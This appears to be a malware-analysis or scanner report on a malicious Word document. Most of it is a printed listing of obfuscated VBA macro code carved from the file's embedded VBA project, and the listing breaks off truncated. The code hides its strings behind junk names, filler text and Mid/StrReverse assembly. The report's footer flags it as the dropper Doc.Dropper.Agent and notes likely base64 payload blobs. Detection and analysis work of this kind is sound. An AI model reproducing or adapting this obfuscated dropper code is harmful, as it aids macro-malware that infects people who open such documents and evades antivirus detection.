Dim posingcommissionshabitsgenerateextrasemperorchar As Boolean
interpretationhuntervenuesvelocitygenevamonitors = interpretationhuntervenuesvelocitygenevamonitors + Mid("prairiesubscribewifeillinoisncguidesrangersantextempislandmicdavidsonmustelectronicswillowru", 44, 5)
startsspecialistaddressmetallickeepdesktopsinappropriatejobconsortium = Not (437 > 557)
Dim huntingtonantmanageactivelydiameterindexedrebatesebay As Variant
interpretationhuntervenuesvelocitygenevamonitors = interpretationhuntervenuesvelocitygenevamonitors + Mid("coverageringtoneaboriginallouisbattesnakereadilyjoinmass", 32, 5)
pacconstitutionmycashnavigationbluesvisitsseat = Chr(214)
adjustedpurchasesthirtywang = Not (579 > 336)
interpretationhuntervenuesvelocitygenevamonitors = interpretationhuntervenuesvelocitygenevamonitors + Mid("gotjournalismprogressluxuryrecipesordereddrawnslipryifoundeddeterminelanguagesibmthustensionequalityvista", 51, 3)
Dim boliviagamingscriptsshanghaioldimposedweblogswnphysiology() As Byte
ridenginesmichiganfossil = LTrim("thyreductionappealsnightshasoopshappenfairlyheldraw")
interpretationhuntervenuesvelocitygenevamonitors = interpretationhuntervenuesvelocitygenevamonitors + Mid("exhibitfgfuturesrapromotingpolicebecominginterestndoneattackdarwinrouletteimportdoslovelycharacteristicscomparison", 50, 5)
Rem messagesshieldeastbonusacrylictroops
Dim wisconsintrianglelpnomoisturebasinpresentationswallace As Object
interpretationhuntervenuesvelocitygenevamonitors = interpretationhuntervenuesvelocitygenevamonitors + Mid("visitlloydplayerstylishbrazilpolyphonicsiaareunionnecklacelogicalemailmoreoverpriestpctpension", 40, 4)
Dim patriciareasondslcovermedicalstuffedtaylorcoins As Variant
Dim infowakestrongergentlydivisionstaxationbutterfly As Boolean
interpretationhuntervenuesvelocitygenevamonitors = interpretationhuntervenuesvelocitygenevamonitors + Mid("kurtomahasnowboardcrudecomputevictimsreadingsheaderpossibilitypartmrcaaudioolivegenerationsbiggerquarterlycontractinglimits", 63, 5)
Rem bestialitypharmaceuticalaidsdonorsbidderlexmarkjohnsbinary
nightlifesheriffexpenditure = Array("tiirabathroomphys", "sallymusicvulnerabilitydispatchedaudcemeteryroulettedomainprospective", "gabrielgirlstennesseecoveragealotbiotechnologycasalift", "insectsthinkpadjenniferind", "assignminimumconsistencywoodegyptspecsintel", "wasteozbrowserswarningdevicesopinions", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzsettlevintagetwistproceedingsoasishappenwendy", "earlierquestbangbussharewarepaperbacks", "qualitybbroommatecarbonpestwork", "groupmechanicsnationaladmissionfragrancesscreen", "girlfriendthirtytooknoonwaxengineeringindianadegreefootwear", "trackingdozensubscribenonpsychologyindividual", "logicfigjokewantingmountimpressedokaymissourismithsonian", "codrumsaddingbraveaheliteposters")
interpretationhuntervenuesvelocitygenevamonitors = interpretationhuntervenuesvelocitygenevamonitors + StrReverse("lstne")
tcflorencembainstantlostconstraintindependencealloyangelagras = Array("dentalnodefingerswingnearby", "wayparticipatingwireskingsrepairmastercardappliedmodified", "episodestransportationlettersworshipinitialhuntingfattydiskconditionsrefrigerator", "gsoperationfolderssuggestsmotionregardingfogneckclips", "trafficproceduretwistedandreaguaranteeevaluatingbrokervichandbagscaught")
belongsrangingsimilaryesterdaygreenhouseperformingfujitsunevadaexit = RTrim("maintainintersectionstarringherbsulglovescroatiabrieflyremembered")
interpretationhuntervenuesvelocitygenevamonitors = interpretationhuntervenuesvelocitygenevamonitors + StrReverse("mykcu")
Rem henrycrapscountysean
broaderdildosABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzbikesquarterscritical = Chr(252)
interpretationhuntervenuesvelocitygenevamonitors = interpretationhuntervenuesvelocitygenevamonitors + StrReverse("ramv")
Dim historyratednewmannavigatortypeprogressgunslitecorporate() As Byte
downloadedlogitechnormancoolladies = 7356
interpretationhuntervenuesvelocitygenevamonitors = interpretationhuntervenuesvelocitygenevamonitors + StrReverse("t")
boostserbreedpreparation = 156 Xor 93
secretariatcedarbacterialenteringbladehelpinggeometryrinvestigate = Array("nonepvcbusinessesmereratminutesvisitedsilentcomfortable", "getwestminstercuriousemmafindswedishinvestingslowly", "appealcoastadvisesign", "cpbdsmmichelsustainablesupportvictoryporkdisabilitiesflameliable", "somacontrolledmarkersecureddesiresurvivorscapeaerospace", "acmcursorfundtutorialscemeterysufficientphotographybath", "societysenderproteinswaitingpriest", "passpixroadsstoredservicesdiningatlanta", "lsspreadsleepwhatevernigeria", "programsvsresumequiteste")
bodiesearnedcaddevelbrokerswritersadultslouisiana = ""
bodiesearnedcaddevelbrokerswritersadultslouisiana = bodiesearnedcaddevelbrokerswritersadultslouisiana + StrReverse("bsa")
accordingmodulessynthesisgemfujitsumphspareclosely = Space(39)
ntdedicatedclaimedmalicareersperlifetimeconservative = Space(59)
bodiesearnedcaddevelbrokerswritersadultslouisiana = bodiesearnedcaddevelbrokerswritersadultslouisiana + StrReverse("sotse")
girlscapitalmatchensureszshopsbarbara = LTrim("curiouspermanentyahooceltic")
Rem pokemonasscertificatereductionnoblereferralsaffiliates
bodiesearnedcaddevelbrokerswritersadultslouisiana = bodiesearnedcaddevelbrokerswritersadultslouisiana + Mid("somewhatcommonmonetarystrongbeanwestesomersetsoonretainedembassylookup", 33, 5)
censusstudiedspiderfundcontainer = RTrim("scheduledwillowcriticsmodel")
chadwholesalelargestresulted = Not (470 < 767)
bodiesearnedcaddevelbrokerswritersadultslouisiana = bodiesearnedcaddevelbrokerswritersadultslouisiana + StrReverse("tognr")
consistentlyquantitiesqualifymotorola = RTrim("suppliedgentlemandeletedarisetigershappeninglemonweekends")
'biggestcharacteristicfullhabits
bodiesearnedcaddevelbrokerswritersadultslouisiana = bodiesearnedcaddevelbrokerswritersadultslouisiana + StrReverse("uqo")
Dim debtconferencepaulswitcherpattributestakeholderstuningdarkness As Integer
Dim warnerqualitiesproducingresolution As Integer
bodiesearnedcaddevelbrokerswritersadultslouisiana = bodiesearnedcaddevelbrokerswritersadultslouisiana + Mid("renaissancerepresentationsrehabguaranteesseriousdrawprettyestiringhospitalityrestaurantscopeng", 59, 4)
Rem berlinwoolbattlefieldsecuredmerchantgenome
'broadertheoreticalgeneralacademicsawesome
bodiesearnedcaddevelbrokerswritersadultslouisiana = bodiesearnedcaddevelbrokerswritersadultslouisiana + Mid("walkingarbormorningtransferspubsmomentsonfextendsskipnaturalssponsorstwelvegrowing", 40, 3)
newerpetersoncontracthugheslisakindsreproductive = StrReverse("desperatesourcesdocspromisesrnaadipexbenchduncan")
Dim affiliatestechnologycornerskingstonwishing As String
bodiesearnedcaddevelbrokerswritersadultslouisiana = bodiesearnedcaddevelbrokerswritersadultslouisiana + Mid("openedtwinsrisksaslooksleepingboltinitiatedligscriptingtreatmentpursegonna", 44, 3)
Dim pensionmaltafootwearregionsprobablycircuitdangerlt() As Byte
For collectivelightweightscannersregardedstrangecolombiabennett = 7376 To 4300
collectorssellernashvilledatpridedigittrainedport = Space(10)
civiliansetchilerememberistanbulmbaelectroroommatesyoungerslight = RTrim("sigbracketdeveloperwisconsinoneshighwaysterriblelined")
Next collectivelightweightscannersregardedstrangecolombiabennett
bodiesearnedcaddevelbrokerswritersadultslouisiana = bodiesearnedcaddevelbrokerswritersadultslouisiana + Mid("cottonemiratesglassptshtsshareantiquefoundationsdarwinsurroundingnutitled", 23, 3)
corporationpeaceleubeeroutdoorsexceptmarshalltraditionactortit = LTrim("basementsuccessfularoundcambridgemarijuanaparadise")
architectpromptlyconfusedlabourdublinresultsreviewingroundsbrakescleveland = Array("lastingiconproduceshandlingtearsinvestigated", "princenicesmallacts", "humanityconsideringtheoriesresearcheressentialrequestsapprovalcanbroken", "miscellaneouswantcensusbunchspotlightwalletpagessubscriptions", "operationsganimalswebcamseverybodyvideosphilosophy", "alternativedramaticpdnorwaybellereliefguistatutesquiapplicants", "screeningdresseddoingtinyfairlycodingworlds", "scholarshipuniversalsubstanceoil", "ricepacklayersdavidcaroline", "healthyindexedcircuitwordexecutionmachines", "permittedswitchesserialass")
holmesgenresminuteunits = ""
holmesgenresminuteunits = holmesgenresminuteunits + StrReverse("ved")
Dim expmilfhunterdangerousinquire As Variant
bottleswiressessionrecoveryharryziparemo
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 196608 bytes
SHA-256: a692c8843007487beed1fc4583e01e70ce2a2063bcf5856c9325e1551dc05eaa
Detection
ClamAV: Doc.Dropper.Agent-6997892-0
Obfuscation or payload: likely
Carved artifact contains 16 long base64-like blob(s).